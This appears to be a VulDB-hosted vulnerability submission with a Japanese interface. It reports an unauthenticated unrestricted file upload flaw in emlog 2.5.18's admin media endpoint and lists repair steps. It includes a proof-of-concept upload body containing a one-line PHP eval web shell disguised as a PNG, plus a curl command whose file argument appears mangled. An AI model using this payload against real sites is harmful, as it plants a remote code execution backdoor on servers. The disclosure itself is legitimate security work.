| タイトル | emlog.net Emlog 2.5.18 Unrestricted Upload |
|---|
| 説明 | # Projectworlds emlog Project V2.5.18 /admin/media.php?action=upload&editor=1&guid=1754908064382 File unrestricted upload
# NAME OF AFFECTED PRODUCT(S)
- emlog
## Vendor Homepage
- emlog.net
# AFFECTED AND/OR FIXED VERSION(S)
## submitter
- l1nk
## Vulnerable File
- /admin/media.php?action=upload&editor=1&guid=1754908064382
## VERSION(S)
- V2.5.18
## Software Link
- https://www.emlog.net/
# PROBLEM TYPE
## Vulnerability Type
- File unrestricted upload
## Root Cause
- A file unrestricted upload vulnerability was found in the '/admin/media.php?action=upload&editor=1&guid=1754908064382 ' file of the 'emlog' project. The reason for this issue is that attackers can upload arbitrary files (including malicious scripts) through the parameter without proper verification of file type, size, content, or storage path, allowing them to execute malicious code on the server and perform unauthorized operations.
## Impact
- Attackers can exploit this file unrestricted upload vulnerability to upload malicious scripts (such as PHP, JSP, ASP files), gain server control, access or tamper with sensitive data, spread malware, and even cause service paralysis, posing a severe threat to system security and data confidentiality.
# DESCRIPTION
- During the security review of "emlog", I discovered a critical file unrestricted upload vulnerability in the "/admin/media.php?action=upload&editor=1&guid=1754908064382 " file. This vulnerability arises from inadequate validation and restrictions on the parameter when handling file uploads, enabling attackers to upload arbitrary files. As a result, attackers can execute malicious code on the server, gain unauthorized access to the system, and compromise data security. Immediate remedial measures are required to ensure system security and protect data integrity.
# No login or authorization is required to exploit this vulnerability
# Vulnerability details and POC
## Vulnerability location:
- /admin/media.php?action=upload&editor=1&guid=1754908064382
## Payload:
```makefile
-----------------------------23668364613108984862299115625
Content-Disposition: form-data; name="editormd-image-file"; filename="渗透流程.php.png"
Content-Type: image/png
<?php
@eval($_POST['shell']);
?>
-----------------------------23668364613108984862299115625--
```
## The following are screenshots of some specific information obtained from testing file uploads:
```bash
《curl -X POST -F "[email protected]" http://10.20.33.16/admin/media.php?action=upload&editor=1&guid=1754908064382 》
```
<img width="1986" height="1064" alt="Image" src="https://github.com/user-attachments/assets/ee3a0d57-34fc-4f3d-9c48-ee75ff8aa6f6" />
# Suggested repair
1. **Strict file type verification:**
Verify the file type through MIME type checking, file extension whitelisting, and even file content inspection to ensure only allowed file types (such as images like .jpg, .png) can be uploaded.
2. **Set file size limits:**
Restrict the size of uploaded files to prevent large files from consuming server resources or being used for malicious purposes.
3. **Store files outside the web root directory:**
Save uploaded files in a directory that is not directly accessible via the web, and use a script to read and deliver files when needed, avoiding direct execution of uploaded files.
4. **Rename uploaded files:**
Generate a unique random name for each uploaded file instead of using the original filename, which can prevent path traversal attacks and ensure file uniqueness.
5. **Regular security audits:**
Regularly check the file upload function and related code to identify and fix potential security loopholes in a timely manner.
<img width="1986" height="1064" alt="Image" src="https://github.com/user-attachments/assets/ee3a0d57-34fc-4f3d-9c48-ee75ff8aa6f6" /> |
|---|
| ソース | ⚠️ https://github.com/lan041221/cvec/issues/9 |
|---|
| ユーザー | l1nk (UID 76857) |
|---|
| 送信 | 2025年08月11日 15:41 (9 月 ago) |
|---|
| モデレーション | 2025年08月21日 07:18 (10 days later) |
|---|
| ステータス | 重複 |
|---|
| VulDBエントリ | 320765 [Emlog Pro 迄 2.5.18 media.php?action=upload&sid=0 ファイル 特権昇格] |
|---|
| ポイント | 0 |
|---|